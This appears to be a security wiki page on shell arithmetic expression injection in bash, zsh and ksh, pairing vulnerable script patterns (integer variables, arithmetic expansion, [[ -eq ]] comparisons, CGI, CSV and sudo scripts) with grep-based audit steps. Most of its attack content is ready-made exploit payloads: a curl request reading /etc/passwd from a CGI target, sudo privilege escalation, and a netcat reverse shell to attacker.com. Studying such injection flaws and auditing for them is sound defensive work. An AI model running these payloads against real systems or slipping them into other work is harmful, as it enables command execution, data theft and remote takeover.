# Shell Arithmetic Expression Exploitation
{% hint style="info" %} **`Affected Shells`****:** **`bash`**, **`zsh`**, **`ksh`**, **`pdksh`**, **`mksh`**
{% endhint %}
Technical Analysis
When a variable is declared as an integer type or used in arithmetic contexts, shells don't just evaluate the value as a number they evaluate it as an **`arithmetic expression`**. This includes:
* Mathematical operators (**`+`**, **`-`**, **`*`**, **`/`**)
* Assignment operators (**`=`**, **`+=`**, **`-=`**)
* Array subscripts with command substitution: **`array[$(command)]`**
{% code title="The key exploitation primitive is that array subscripts can contain command substitutions and this is valid arithmetic expression syntax:" overflow="wrap" %}
```shellscript
x[$(whoami)]=value
```
{% endcode %}
{% hint style="info" %} **`Integer Variable Declaration`**
{% code title="Integer Variable Declarations" overflow="wrap" %}
```bash
typeset -i n
declare -i n
n="$user_input"
```
{% endcode %}
The variable is to be treated as an integer; arithmetic evaluation is performed when the variable is assigned a value.
{% code title="Exploit:" overflow="wrap" %}
```shellscript
./script.sh 'x[$(whoami>&2)]'
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Arithmetic Expansion`**
{% code title="Arithmetic Expansion" overflow="wrap" %}
```bash
#!/bin/bash
result=$(( $user_input ))
# or
result=$[ $user_input ]
```
{% endcode %}
{% code title="Exploit:" overflow="wrap" %}
```bash
./script.sh 'x[$(cat /etc/passwd>&2)]'
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Comparison Operators in [[ ]]`**
{% code title="This is the sneaky one that looks safe:" overflow="wrap" %}
```shellscript
#!/bin/bash
if [[ "$user_input" -eq 100 ]]; then
echo "OK"
fi
```
{% endcode %}
Operators like **`-eq`**, **`-ne`**, **`-lt`**, **`-le`**, **`-gt`**, **`-ge`** inside **`[[ ]]`** trigger arithmetic evaluation of their operands.
{% code title="Exploit:" overflow="wrap" %}
```shellscript
curl -d num='x[$(cat /etc/passwd > /proc/$$/fd/1)]' http://target/index.cgi
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Parameter Expansion`**
{% code title="offset and length evaluated as arithmetic" overflow="wrap" %}
```bash
${var:$offset:$length}
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Read Command`**
{% code title="Even reading from stdin triggers this:" overflow="wrap" %}
```shellscript
typeset -i n
read n
```
{% endcode %}
{% endhint %}
{% hint style="warning" %} The **`>&2`** redirects output to **`stderr`** so the command result doesn't\ interfere with array indexing, while still being visible.
{% endhint %}
CGI Script Exploitation
{% code title="Vulnerable CGI:" overflow="wrap" %}
```shellscript
#!/bin/bash
read PARAMS
NUM="${PARAMS#num=}"
if [[ "$NUM" -eq 100 ]]; then
echo "OK"
else
echo "NG"
fi
```
{% endcode %}
{% code title="Exploit Payload:" overflow="wrap" %}
```shellscript
curl -d num='x[$(cat /etc/passwd > /proc/$$/fd/1)]' http://target/index.cgi
```
{% endcode %}
CSV Injection
{% code title="Vulnerable Script:" overflow="wrap" %}
```bash
#!/bin/bash
while IFS=, read item price num; do
echo "$item,$((price*num))"
done < "data.csv"
```
{% endcode %}
{% code title="Malicious CSV Entry:" overflow="wrap" %}
```csv
product,100,x[$(whoami>&2)]
```
{% endcode %}
Privilege Escalation via SUID/Sudo Scripts
{% code title="Vulnerable Code" overflow="wrap" %}
```shellscript
#!/bin/bash
typeset -i n
n="$1"
```
{% endcode %}
{% code title="Exploit" overflow="wrap" %}
```bash
sudo ./script.sh 'x[$(whoami>&2)]'
```
{% endcode %}
Variable Overwrite
{% code title="Expected: Always prints 5" overflow="wrap" %}
```bash
#!/bin/bash
typeset -i n
a=5
n="$1"
echo "$a"
```
{% endcode %}
{% code title="The arithmetic expression a=10 was evaluated, overwriting the variable a" overflow="wrap" %}
```bash
./script.sh a=10
# Output: 10
```
{% endcode %}
Detection Methodology
{% hint style="info" %} **`Step 1: Code Audit - Find Vulnerable Patterns`**
{% code title="Search for integer declarations" overflow="wrap" %}
```bash
grep -rn "typeset -i\|declare -i" /path/to/scripts/
```
{% endcode %}
{% code title="Search for arithmetic comparisons in \[\[]]" overflow="wrap" %}
```bash
grep -rn "\[\[.*-eq\|-ne\|-lt\|-le\|-gt\|-ge" /path/to/scripts/
```
{% endcode %}
{% code title="Search for arithmetic expansion" overflow="wrap" %}
```bash
grep -rn '\$((.*))' /path/to/scripts/
grep -rn '\$\[.*\]' /path/to/scripts/
```
{% endcode %}
{% code title="Search for parameter expansion with offsets" overflow="wrap" %}
```bash
grep -rn '\${[^}]*:[^}]*:[^}]*}' /path/to/scripts/
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Step 2: Trace User Input Flow`**
Identify all entry points for user data:
* Command-line arguments: **`$1`**, **`$2`**, **`$@`**, **`$*`**
* Environment variables: **`$QUERY_STRING`**, **`$HTTP_*`**
* File input: **`read`** command
* Stdin: **`read`** without **`-r`** flag
{% endhint %}
{% hint style="info" %} **`Step 3: Test with Proof-of-Concept`**
{% code title="Command execution" overflow="wrap" %}
```shellscript
'x[$(whoami>&2)]'
```
{% endcode %}
{% code title="Test 2: Variable overwrite" overflow="wrap" %}
```shellscript
'sensitive_var=999'
```
{% endcode %}
{% code title="Test 3: File read" overflow="wrap" %}
```shellscript
'x[$(cat /etc/passwd>&2)]'
```
{% endcode %}
{% code title="Test 4: Network connection" overflow="wrap" %}
```shellscript
'x[$(nc attacker.com 4444 -e /bin/bash)]'
```
{% endcode %}
{% endhint %}
{% hint style="info" %} **`Step 4: Verify Execution Context`**
{% code title="Check if running with elevated privileges" overflow="wrap" %}
```shellscript
sudo ./target_script 'x[$(id>&2)]'
```
{% endcode %}
{% endhint %}
{% embed url="" %}